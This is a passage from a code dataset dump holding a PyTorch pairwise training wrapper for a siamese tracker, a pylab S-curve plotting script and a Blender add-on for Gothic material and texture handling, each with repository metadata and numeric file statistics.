('act2', activation(inplace=True)),
] if m[1] is not None))
| 36.413043
| 93
| 0.605373
| 188
| 1,675
| 5.12766
| 0.271277
| 0.091286
| 0.118257
| 0.108921
| 0.681535
| 0.681535
| 0.681535
| 0.681535
| 0.642116
| 0.561203
| 0
| 0.021809
| 0.260896
| 1,675
| 45
| 94
| 37.222222
| 0.756866
| 0
| 0
| 0.34375
| 0
| 0
| 0.027607
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0625
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e473c9d126543858d93cd7cc38a1863415d85a8
| 3,419
|
py
|
Python
|
siam_tracker/models/train_wrappers/pairwise_wrapper.py
|
microsoft/PySiamTracking
|
a82dabeaa42a7816dbd8e823da7b7e92ebb622ce
|
[
"MIT"
] | 28
|
2020-03-18T04:41:21.000Z
|
2022-02-24T16:44:01.000Z
|
siam_tracker/models/train_wrappers/pairwise_wrapper.py
|
HengFan2010/PySiamTracking
|
a82dabeaa42a7816dbd8e823da7b7e92ebb622ce
|
[
"MIT"
] | 1
|
2020-04-05T15:23:22.000Z
|
2020-04-07T16:23:12.000Z
|
siam_tracker/models/train_wrappers/pairwise_wrapper.py
|
HengFan2010/PySiamTracking
|
a82dabeaa42a7816dbd8e823da7b7e92ebb622ce
|
[
"MIT"
] | 11
|
2020-03-19T00:30:06.000Z
|
2021-11-10T08:22:35.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import torch
from collections import OrderedDict
from ..builder import build_tracker, TRAIN_WRAPPERS
from ...datasets import TrainPairDataset, build_dataloader
from ...runner import Runner
from ...utils.parallel import MMDataParallel
from ...utils import load_checkpoint
@TRAIN_WRAPPERS.register_module
class PairwiseWrapper(object):
def __init__(self,
train_cfg,
model_cfg,
work_dir,
log_level,
resume_from=None,
gpus=1):
""" Training a tracker by image pairs. This is the most common strategy to train a
siamese-network-based tracker. Generally, two images are randomly sampled from the
dataset, one for template image (z_img) and another for search region (x_img). The
tracker model needs to locate the target object in search region.
"""
self.model_cfg = model_cfg
self.train_cfg = train_cfg
# Step 1, build the tracker model.
model = build_tracker(model_cfg, is_training=True, train_cfg=train_cfg, test_cfg=None)
if resume_from is not None:
load_checkpoint(model, resume_from)
model = MMDataParallel(model, device_ids=list(range(gpus))).cuda()
# Step 2, build image-pair datasets
train_dataset = TrainPairDataset(train_cfg.train_data)
self.data_loaders = build_dataloader(train_dataset,
train_cfg.samples_per_gpu,
train_cfg.workers_per_gpu,
num_gpus=gpus)
# Step 3, build a training runner
# build runner
self.runner = Runner(model, self.batch_processor, train_cfg.optimizer, work_dir, log_level)
self.runner.register_training_hooks(train_cfg.lr_config, train_cfg.optimizer_config,
train_cfg.checkpoint_config, train_cfg.log_config)
if 'status_config' in train_cfg and train_cfg['status_config'] is not None:
self.runner.register_status_hook(train_cfg['status_config'])
def run(self):
self.runner.run(self.data_loaders,
self.train_cfg.workflow,
self.train_cfg.total_epochs)
@staticmethod
def batch_processor(model, data, train_mode):
losses = model(**data)
loss, log_vars = PairwiseWrapper.parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['z_imgs'].data))
return outputs
@staticmethod
def parse_losses(losses):
log_vars = OrderedDict()
for loss_name, loss_value in losses.items():
if isinstance(loss_value, torch.Tensor):
log_vars[loss_name] = loss_value.mean()
elif isinstance(loss_value, list):
log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
else:
raise TypeError(
'{} is not a tensor or list of tensors'.format(loss_name))
loss = sum(_value for _key, _value in log_vars.items() if 'loss' in _key)
log_vars['loss'] = loss
for name in log_vars:
log_vars[name] = log_vars[name].item()
return loss, log_vars
| 38.852273
| 99
| 0.623867
| 418
| 3,419
| 4.856459
| 0.344498
| 0.070936
| 0.023645
| 0.014778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001672
| 0.300088
| 3,419
| 87
| 100
| 39.298851
| 0.846636
| 0.150044
| 0
| 0.033898
| 0
| 0
| 0.031458
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067797
| false
| 0
| 0.118644
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e4d5fb0fa81e143693d4b850e79279a83dcb058
| 622
|
py
|
Python
|
preprocessed_data/RGHS/Code/S_model.py
|
SaiKrishna1207/Underwater-Image-Segmentation
|
78def27e577b10e6722c02807bdcfeb7ba53d760
|
[
"MIT"
] | null | null | null |
preprocessed_data/RGHS/Code/S_model.py
|
SaiKrishna1207/Underwater-Image-Segmentation
|
78def27e577b10e6722c02807bdcfeb7ba53d760
|
[
"MIT"
] | null | null | null |
preprocessed_data/RGHS/Code/S_model.py
|
SaiKrishna1207/Underwater-Image-Segmentation
|
78def27e577b10e6722c02807bdcfeb7ba53d760
|
[
"MIT"
] | null | null | null |
import numpy as np
import pylab as pl
x = [] # Make an array of x values
y = [] # Make an array of y values for each x value
for i in range(-128,127):
x.append(i)
for j in range(-128,127):
temp = j *(2**(1 - abs((j/128))))
y.append(temp)
# print('y',y)
# pl.xlim(-128, 127)# set axis limits
# pl.ylim(-128, 127)
pl.axis([-128, 127,-128, 127])
pl.title('S-model Curve Function ',fontsize=20)# give plot a title
pl.xlabel('Input Value',fontsize=20)# make axis labels
pl.ylabel('Output Value',fontsize=20)
pl.plot(x, y,color='red') # use pylab to plot x and y
pl.show() # show the plot on the screen
| 23.037037
| 66
| 0.639871
| 119
| 622
| 3.344538
| 0.478992
| 0.090452
| 0.055276
| 0.065327
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093626
| 0.192926
| 622
| 27
| 67
| 23.037037
| 0.699203
| 0.360129
| 0
| 0
| 0
| 0
| 0.126289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e4db1ef4c553d26b23cdf167ecc2ec7e965d780
| 36,578
|
py
|
Python
|
tools/Blender Stuff/Plugins/Gothic_MaT_Blender/1.3/Gothic_MaT_Blender_1_3.py
|
PhoenixTales/gothic-devk
|
48193bef8fd37626f8909853bfc5ad4b7126f176
|
[
"FSFAP"
] | 3
|
2021-04-13T07:12:30.000Z
|
2021-06-18T17:26:10.000Z
|
tools/Blender Stuff/Plugins/Gothic_MaT_Blender/1.3/Gothic_MaT_Blender_1_3.py
|
PhoenixTales/gothic-devk
|
48193bef8fd37626f8909853bfc5ad4b7126f176
|
[
"FSFAP"
] | null | null | null |
tools/Blender Stuff/Plugins/Gothic_MaT_Blender/1.3/Gothic_MaT_Blender_1_3.py
|
PhoenixTales/gothic-devk
|
48193bef8fd37626f8909853bfc5ad4b7126f176
|
[
"FSFAP"
] | 2
|
2021-03-23T19:45:39.000Z
|
2021-04-17T17:21:48.000Z
|
bl_info = {
"name": "Gothic Materials and Textures Blender",
"description": "Makes life easier for Gothic material export",
"author": "Diego",
"version": (1, 3, 0),
"blender": (2, 78, 0),
"location": "3D View > Tools",
"warning": "", # used for warning icon and text in addons panel
"wiki_url": "",
"tracker_url": "",
"category": "Development"
}
import bpy
# if not blenders bundled python is used, packages might not be installed
try:
from mathutils import Color
except ImportError:
raise ImportError('Package mathutils needed, but not installed')
try:
import numpy
except ImportError:
raise ImportError('Package numpy needed, but not installed')
try:
import os.path
except ImportError:
raise ImportError('Package os needed, but not installed')
try:
import colorsys
except ImportError:
raise ImportError('Package colorsys needed, but not installed')
from bpy.props import (StringProperty,
BoolProperty,
IntProperty,
FloatProperty,
EnumProperty,
PointerProperty,
)
from bpy.types import (Panel,
Operator,
PropertyGroup,
)
# ------------------------------------------------------------------------
# store properties in the active scene
# ------------------------------------------------------------------------
class GothicMaterialSettings(PropertyGroup):
apply_to_selected_only = BoolProperty(
name="Only Selected Objects",
description="Affect only selected objects rather than all (unhidden) objects in the scene",
default = True
)
keep_existing_materials = BoolProperty(
name="Keep Existing Slots",
description="Keep existing material slots if their texture does not occur and only add new on top",
default = True
)
set_transparency = BoolProperty(
name="Transparency",
description="Alpha channel will affect transparency in textured view",
default = True
)
keep_portals = BoolProperty(
name="Keep Portals",
description="Do not overwrite Portal or Ghostoccluder materials",
default = True
)
matching_name = BoolProperty(
name="Use Matching Names",
description="If exists, use Gothic material with same name as UV-image, even if multiple Gothic materials use this image",
default = True
)
isolate_all_layers = BoolProperty(
name="Isolate in all Layers",
description="Isolate objects in all layers",
default = True
)
pixel_samples = IntProperty(
name = "Pixels",
description="Number of pixels taken for material color, becomes very slow for high numbers",
default = 50,
min = 1,
max = 1000
)
saturation = FloatProperty(
name = "Saturation",
description="Makes material colors more or less saturated, 0.5 for unchanged",
default = 1.,
min = 0.,
max = 2.
)
value = FloatProperty(
name = "Brigthness",
description="Changes material color brigthness",
default = 1.,
min = 0.,
max = 2.
)
searched_material = StringProperty(
name="Material to Search",
description="",
default="unknown",
maxlen=1024,
)
ambiguous_materials = EnumProperty(
name="What Material Name for ambiguous Textures?",
description="What material name for ambiguous textures?",
items=[ ('first', "First Appearance", ""),
('last', "Last Appearance", ""),
('generic', "Generic: ambiguous1, ...", ""),
]
)
case = EnumProperty(
name="Case for Images and Textures",
description="Case-sensitivity for images and textures",
items=[ ('keep', "Keep File Case", ""),
('upper', "UPPER", ""),
('lower', "lower", ""),
]
)
matlib_filepath = StringProperty(
name="",
description="Filepath to MatLib.ini",
default="Filepath to MatLib.ini",
maxlen=1024,
subtype='FILE_PATH')
# ------------------------------------------------------------------------
# operators
# ------------------------------------------------------------------------
# hides all objects that do not have the material specified in the "searched_material" property
# optional: isolate in all layers
class GothicIsolateObjetcs(bpy.types.Operator):
"""Isolate all objects that use this material. Alt+H to reveal""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "object.gothic_isolate_objects" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Isolate Objects" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
searchfor = scene.gothic_tools.searched_material
isolate_all_layers = scene.gothic_tools.isolate_all_layers
if searchfor == '':
self.report({'WARNING'}, 'No Material Specified')
return {'CANCELLED'}
matindex = bpy.data.materials.find(searchfor)
if matindex == -1:
self.report({'WARNING'}, 'Material not found')
return {'CANCELLED'}
else:
mat = bpy.data.materials[matindex]
objects_found = []
# two steps
# first: check if any objects are found
for object in bpy.data.objects:
# if this layer is not supposed to be affected skip
if not isolate_all_layers:
if not object.layers[scene.active_layer]:
continue
# if found, add to the list of found objects
for slot in object.material_slots:
try:
if slot.material == mat:
objects_found.append(object)
break
except AttributeError:
pass
# second: if so, hide + deselect all others and reveal + select themselves (in case they were hidden before)
if objects_found:
for object in bpy.data.objects:
if object in objects_found:
object.hide = False
object.select = True
else:
object.hide = True
object.select = False
self.report({'INFO'}, str(len(objects_found)) + ' objects found')
else:
self.report({'INFO'}, 'No objects found')
return {'FINISHED'} # this lets blender know the operator finished successfully.
# changes the names of all used images to their filename
# if multiple images use the same file, only one is kept
# the others will be replaced by this one
class GothicCleanImages(bpy.types.Operator):
"""Rename and replace images not named as their filename""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_clean_images" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Clean Images and Textures" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
case = scene.gothic_tools.case
replaced_counter = 0
renamed_counter = 0
#rename all images to their filename
for image in bpy.data.images:
if image.users:
filename = os.path.basename(image.filepath)
correct_index = bpy.data.images.find(filename)
if correct_index == -1:
image.name = filename
renamed_counter += 1
else:
correct_image = bpy.data.images[correct_index]
if image != correct_image:
print(image.name + ' remapped to ' + correct_image.name)
image.user_remap(correct_image)
replaced_counter +=1
# optional change to lower or upper case
for image in bpy.data.images:
if image.users:
if case.lower() == 'upper':
image.name = image.name.upper()
elif case.lower() == 'lower':
image.name = image.name.lower()
self.report({'INFO'}, str(replaced_counter) + ' unlinked, ' + str(renamed_counter) + ' renamed (except for case)')
return {'FINISHED'} # this lets blender know the operator finished successfully.
# Removes suffixes like ".001" and renames textures to image filename
# replaces materials with same name except suffixes
# keeps only one texture per image file, replaces others by this one
class GothicCleanMaterials(bpy.types.Operator):
"""Remove suffixes as .001 from materials. Note: If object has \"mat\" and \"mat.001\", the slots Will not be merged""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_clean_materials" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Clean Materials" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
replaced_counter = 0
renamed_counter = 0
# remove suffixes and replace materials that would be named the same
for mat in bpy.data.materials:
if mat.users and len(mat.name)>4:
if mat.name[-4]=='.':
try:
int(mat.name[-3:])
targetname = mat.name[0:-4]
index_of_existing = bpy.data.materials.find(targetname)
if index_of_existing == -1:
mat.name = targetname
renamed_counter +=1
else:
mat.user_remap(bpy.data.materials[index_of_existing])
replaced_counter += 1
except ValueError:
continue
# change texture name to image file name
for tex in bpy.data.textures:
if tex.users:
try:
# may exist already, don't overwrite name yet
texname = os.path.basename(tex.image.filepath)
except AttributeError:
print(tex.name + ' has no image')
continue
found_tex_index = bpy.data.textures.find(texname)
if found_tex_index == -1:
tex.name = texname
else:
tex.user_remap(bpy.data.textures[found_tex_index])
self.report({'INFO'}, str(replaced_counter) + ' unlinked, ' + str(renamed_counter) + ' renamed')
return {'FINISHED'}
# takes a sample of pixels and calculates average color for every material with image
class GothicCalcColors(bpy.types.Operator):
"""Calculate all material colors by texture""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_calc_colors" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Calculate Material Colors" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context):
scene = context.scene
set_transparency = scene.gothic_tools.set_transparency
pixel_samples = scene.gothic_tools.pixel_samples
value = context.scene.gothic_tools.value
saturation = context.scene.gothic_tools.saturation
colors_calculated = 0
too_bright = False
for material in bpy.data.materials:
print('Calc color for ' + material.name)
try:
if len(material.texture_slots[0].texture.image.pixels):
image = material.texture_slots[0].texture.image
else:
continue
except AttributeError:
continue
averagecolor = numpy.array([0.,0.,0.])
# "pixels" has the structure [pixel1_red, pixel1_green, pixel1_blue, pixel1_alpha, pixel2_red, ...]
samples = pixel_samples
n = int(len(image.pixels)/4)
# take no more samples than pixels exist
if samples > n:
samples = n
pixels = image.pixels
for i in range(samples):
pos = int(i/samples*n)*4
averagecolor += image.pixels[pos:pos+3]
averagecolor = averagecolor / samples
if True in numpy.isnan(averagecolor):
averagecolor[:] = [0,0,0]
# adjust saturation and brightness (value)
adjustedcolor = Color(averagecolor)
hsv = list(colorsys.rgb_to_hsv(*adjustedcolor))
hsv[1] += saturation - 1
hsv[2] += value - 1
new_rgb = colorsys.hsv_to_rgb(*hsv)
# Colors may be out of range in some cases, norm to [0,1]
if any(c>1 for c in new_rgb):
max_rbg = max(new_rgb)
new_rgb = (new_rgb[0]/max_rbg,
new_rgb[1]/max_rbg,
new_rgb[2]/max_rbg)
too_bright = True
material.diffuse_color = Color(new_rgb)
material.diffuse_intensity = 1.0
colors_calculated += 1
if set_transparency:
material.use_transparency = True
self.report({'INFO'}, str(colors_calculated) + ' colors updated')
if too_bright:
self.report({'INFO'}, str(colors_calculated) + ' colors updated (clamped)')
return {'FINISHED'}
# replaces all UV textures by the image that the material of this face has
class GothicAssignImages(bpy.types.Operator):
"""Apply UV-Images that correspond to the assigned materials""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_assign_images" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Assign Images by Materials" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
apply_to_selected_only = scene.gothic_tools.apply_to_selected_only
if apply_to_selected_only:
objects_tobechanged = context.selected_objects
if not objects_tobechanged:
self.report({'WARNING'}, 'No objects selected')
else:
objects_tobechanged = bpy.data.objects
for object in objects_tobechanged:
if not object.type == 'MESH':
continue
bpy.context.scene.objects.active = object
bpy.ops.object.mode_set(mode = 'OBJECT')
mesh = object.data
if not mesh.uv_textures:
uv = mesh.uv_textures.new('UvMap')
# collect all materials and their iamge
# map material index to image beforehands into dict: image_by_material_index
image_by_material_index = [None]*len(object.material_slots)
for matindex,matslot in enumerate(object.material_slots):
# if texture or texture image doesn't exist, return None
try:
image_by_material_index[matindex] = matslot.material.texture_slots[0].texture.image
except AttributeError:
pass
# assign image to face
uv = object.data.uv_textures[0]
for index,face in enumerate(mesh.polygons):
uv.data[index].image = image_by_material_index[face.material_index]
self.report({'INFO'}, 'UV-Images assigned to ' +str(len(objects_tobechanged)) + ' objects')
return {'FINISHED'}
# replaces materials by those that belong to the assigned UV textures
# at every call matlib.ini is parsed and for every image a matching material is searched_material
# depending on how often this texture is used by a material, the used material name is
# never: texture name without file extension
# once: take name from materialfilter
# more: ambiguous, depending on settings
# optionally faces with portal materials are not overwritten
# note that this will create a material for all used images in the file if they dont exist. this is done because
# it would be more troublesome to first filter out the actually needed materials
class GothicAssignMaterials(bpy.types.Operator):
"""Apply Materials that Correspond to the Unwrapped UV-Images""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "context.gothic_assign_materials" # unique identifier for buttons and menu items to reference.
bl_label = "Gothic: Assign Materials by UV-Images" # display name in the interface.
bl_options = {'REGISTER'} # enable undo for the operator.
def execute(self, context): # execute() is called by blender when running the operator.
scene = context.scene
apply_to_selected_only = scene.gothic_tools.apply_to_selected_only
matlib_filepath = scene.gothic_tools.matlib_filepath
ambiguous_materials = scene.gothic_tools.ambiguous_materials
matching_name = scene.gothic_tools.matching_name
apply_to_selected_only = scene.gothic_tools.apply_to_selected_only
keep_portals = scene.gothic_tools.keep_portals
# if no objects are selected and "only selected objects", cancel
if apply_to_selected_only:
objects_tobechanged = context.selected_objects
if not objects_tobechanged:
self.report({'WARNING'}, 'No objects selected')
return {'FINISHED'}
# if no valid matlib.ini specified, cancel
matlib_dirpath = os.path.dirname(matlib_filepath)
if not os.path.isfile(matlib_filepath):
self.report({'ERROR'}, 'Invalid MatLib.ini filepath')
return {'CANCELLED'}
# for every used image create or find a matching texture
# use existing textures with correct name if available
# map image to texture into dict "texture_by_image"
used_images = []
texture_by_image = {}
for image in bpy.data.images:
if image.users:
used_images.append(image)
found_matching_texindex = bpy.data.textures.find(image.name)
if found_matching_texindex == -1:
newtex = bpy.data.textures.new(image.name,'IMAGE')
newtex.image = image
texture_by_image[image] = newtex
else:
texture_by_image[image] = bpy.data.textures[found_matching_texindex]
""" gothic materials """
# parse matlib
# create one list of materials, one of corresponing textures and one for colors
# same index for matching material/texture/color
gmaterial_names = []
gtexture_names = []
gmaterial_colors = []
# append found items to given input variables
def add_materials_from_pml(file, materials, textures, colors):
if not os.path.isfile(file):
self.report({'WARNING'}, 'PML not found: ' + file)
return
file=open(file,'r')
for line in file:
if not line.find('% zCMaterial') == -1:
materials.append("")
textures.append("")
colors.append("")
elif not line.find('name=string:') == -1:
materials[-1] = line[line.find('name=string:')+12:-1].upper()
elif not line.find('texture=string:') == -1:
textures[-1] = line[line.find('texture=string:')+15:-1].upper()
elif not line.find('color=color:') == -1:
colors[-1] = line[line.find('color=color:')+12:-1].split(' ')[:-1]
matlib = open(matlib_filepath,'r')
for line in matlib:
if '=#' in line:
add_materials_from_pml(os.path.join(matlib_dirpath, line[0:line.find('=#')]+'.pml'),gmaterial_names,gtexture_names, gmaterial_colors)
# find materials that appear more than once
# start from the end so that with duplicate materials
# the lower index entry will be removed
seenmaterials = set()
duplicates = []
for x in enumerate(list(reversed(gmaterial_names))):
if x[1] in seenmaterials:
duplicates.append(len(gmaterial_names)-1-x[0])
else:
seenmaterials.add(x[1])
# remove duplicate gothic materials from both lists
for duplicate in duplicates:
gmaterial_names.pop(duplicate)
gtexture_names.pop(duplicate)
# find gothic textures that are used by more than one material
ambiguoustex_names = list(set([texname for texname in gtexture_names if gtexture_names.count(texname)>1]))
ambiguoustex_defaultmat = {}
for ambigtexname in ambiguoustex_names:
# take first or last entry
for index in range(len(gmaterial_names)):
if gtexture_names == ambigtexname:
ambiguoustex_defaultmat[ambigtexname.lower()] = gmaterial_names[index]
# if first entry is taken: skip remaining
# else defaultmat is overwritten every time
if ambiguous_materials=='first':
break
# if a material with same name exists and option checked, overwrite
if matching_name:
if ambigtexname in gmaterial_names:
ambiguoustex_defaultmat[ambigtexname.lower()] = ambigtexname
# else if a material with same name except extension exists, take it as default
elif ambigtexname[0:-4] in gmaterial_names:
ambiguoustex_defaultmat[ambigtexname.lower()] = ambigtexname[0:-4]
""" blender materials """
# for every blender texture: what should be the material name
# if no corresponding gtex: same name as in gothic
# if one correspoding gtex: use the existing material name
# if ambiguous: first, last or generic ('ambiguous1'...), additionally matching name if available
# save the determined material name in var "bmat_name_by_image" mapped by image
bmat_name_by_image = {}
bmat_color_by_image = {}
index_of_ambiguous = 1
for image in used_images:
gmat_exists = False
# gtex_index is used to find the gmat, because they have same indices
for gtex_index, gtex_name in enumerate(gtexture_names):
if gtex_name.lower() == image.name.lower():
bmat_color_by_image[image] = Color([int(x)/255 for x in gmaterial_colors[gtex_index]])
if not gtex_name in ambiguoustex_names:
bmat_name_by_image[image] = gmaterial_names[gtex_index]
else:
if ambiguous_materials=='generic':
bmat_name_by_image[image] = 'ambiguous'+str(index_of_ambiguous)
index_of_ambiguous += 1
else:
bmat_name_by_image[image] = ambiguoustex_defaultmat[image.name.lower()]
gmat_exists = True
break;
if not gmat_exists:
# take filename without extension and default color
bmat_name_by_image[image] = os.path.basename(image.name).upper()[0:-4]
bmat_color_by_image[image] = Color([0.8, 0.8, 0.8])
# collect the materials that belong to any existing used image
# (not only those images that appear in the selected objects, because its simpled this way)
# use existing materials with correct name if available
# first create global 'unknown' material for faces without image
# even if no unknown exist, zero users will still be a useful indicator
if bpy.data.materials.find('unknown')==-1:
matunknown = bpy.data.materials.new('unknown')
matunknown.diffuse_color = Color([1,0,1]) # pink
else:
matunknown = bpy.data.materials[bpy.data.materials.find('unknown')]
material_by_image = {}
material_by_image[None] = matunknown
for image,bmat_name in bmat_name_by_image.items():
found_existing_bmat = False
for scannedmaterial in bpy.data.materials:
if scannedmaterial.name == bmat_name:
targetmat = scannedmaterial
found_existing_bmat = True
break;
if not found_existing_bmat:
targetmat = bpy.data.materials.new(bmat_name)
targetmat.diffuse_color = bmat_color_by_image[image]
material_by_image[image] = targetmat
# determine texture for this material
corresponding_texture = texture_by_image[image]
for slot in targetmat.texture_slots:
if slot:
break
else:
targetmat.texture_slots.add()
targetmat.texture_slots[0].texture = corresponding_texture
# iterate over all polygons and look up the matching material
# for every used image in the file the matching material is mapped inside var "material_by_image"
if apply_to_selected_only:
objects_tobechanged = context.selected_objects
else:
objects_tobechanged = bpy.data.objects
for object in objects_tobechanged:
if not object.type == 'MESH':
continue
if object.hide:
continue
bpy.context.scene.objects.active = object
bpy.ops.object.mode_set(mode = 'OBJECT')
mesh = object.data
# keep_mat_with_index stores material slot numbers which will not be overwritten by UV (portals)
keep_mat_with_index = []
# slot_is_used contains any material index that will not be deleted after reassigning the slots
slot_is_used = [False]*len(object.material_slots)
try:
if keep_portals:
for matindex, matslot in enumerate(object.material_slots):
n = matslot.material.name.lower()
if n == 'ghostoccluder' or \
n[0:2] == 'p:' or \
n[0:3] == 'pi:' or \
n[0:3] == 'pn:':
keep_mat_with_index.append(matindex)
slot_is_used[matindex] = True
except AttributeError:
pass
if not mesh.uv_textures:
# in this case only unknown material except portals will be assigned
uv = mesh.uv_textures.new('UVMap')
else:
uv = mesh.uv_textures[0]
# for every polygon look up which material matches its UV image
for index,face in enumerate(mesh.polygons):
image = mesh.uv_textures[0].data[index].image
# dont assign anything if not supposed to because its a portal
if face.material_index in keep_mat_with_index:
continue;
# if no image, take 'unknown' mat
if not image:
mat = matunknown
else:
# for every image a material should be mapped in material_by_image
if image in material_by_image:
mat = material_by_image[image]
else:
# something went wrong, most likely image users not updated correctly
raise ValueError('No mapped material found for '+image.name + '. Most likely the images are not updated internally. Try restarting Blender')
mat = matunknown
# check if object has this material already
for slotindex,slot in enumerate(object.material_slots):
if slot.material == mat:
face.material_index = slotindex
slot_is_used[slotindex] = True
break;
# if not, add a slot at bottom (new slot will be last)
else:
bpy.ops.object.material_slot_add()
object.active_material = mat
object.material_slots[object.active_material_index].link = 'DATA'
face.material_index = object.active_material_index
slot_is_used.append(True)
# delete unused slots from bottom to top
for slot_reversed, used in enumerate(reversed(slot_is_used)):
if not used:
slot = len(slot_is_used) - slot_reversed - 1
object.active_material_index = slot
bpy.ops.object.material_slot_remove()
self.report({'INFO'}, 'Materials assigned to ' +str(len(objects_tobechanged)) + ' objects')
return {'FINISHED'} # this lets blender know the operator finished successfully.
# ------------------------------------------------------------------------
# gothic tools in objectmode
# ------------------------------------------------------------------------
class VIEW3D_PT_gothic_clean_duplicates_panel(Panel):
bl_idname = "OBJECT_PT_gothic_clean_duplicates_panel"
bl_label = "Clean Duplicates"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('context.gothic_clean_images', text = 'Clean Images', icon = 'IMAGE_DATA')
layout.operator('context.gothic_clean_materials', text = 'Clean Materials', icon = 'MATERIAL')
layout.label(text="Case:")
layout.prop(gothic_tools, "case", text="")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_assign_materials_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_assign_materials_panel"
bl_label = "UVs to Materials"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('context.gothic_assign_materials', text = 'Assign Materials', icon = 'FACESEL')
layout.separator()
layout.prop(gothic_tools, "matlib_filepath", text="")
layout.prop(gothic_tools, "apply_to_selected_only")
layout.prop(gothic_tools, "keep_portals")
layout.separator()
layout.label(text="Ambiguous Textures:")
layout.prop(gothic_tools, "matching_name")
layout.label(text="or else")
layout.prop(gothic_tools, "ambiguous_materials", text="")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_assign_images_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_assign_images_panel"
bl_label = "Materials to UVs"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('context.gothic_assign_images', text = 'Assign Images', icon = 'FACESEL_HLT')
layout.prop(gothic_tools, "apply_to_selected_only")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_material_colors_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_material_colors_panel"
bl_label = "Material Colors"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = context.scene.gothic_tools
layout.operator('context.gothic_calc_colors', text = 'Calc Colors (slow)', icon = 'COLOR')
row = layout.row()
row.prop(gothic_tools, "set_transparency")
row.prop(gothic_tools, "pixel_samples")
layout.prop(gothic_tools, "saturation")
layout.prop(gothic_tools, "value")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_search_material_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_search_material_panel"
bl_label = "Search Material"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('object.gothic_isolate_objects', text = 'Isolate Objects', icon = 'VIEWZOOM')
layout.prop(gothic_tools, "searched_material", text="with Mat")
layout.prop(gothic_tools, "isolate_all_layers")
layout.separator()
layout.separator()
# ------------------------------------------------------------------------
# register and unregister
# ------------------------------------------------------------------------
def register():
bpy.utils.register_module(__name__)
bpy.types.Scene.gothic_tools = PointerProperty(type=GothicMaterialSettings)
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Scene.gothic_tools
if __name__ == "__main__":
register()
| 43.963942
| 194
| 0.561458
| 3,885
| 36,578
| 5.137194
| 0.133848
| 0.022046
| 0.020844
| 0.011424
| 0.322177
| 0.280689
| 0.242259
| 0.23339
| 0.205632
| 0.190951
| 0
| 0.006702
| 0.347285
| 36,578
| 832
| 195
| 43.963942
| 0.829236
| 0.205588
| 0
| 0.336134
| 0
| 0.001681
| 0.128926
| 0.02056
| 0
| 0
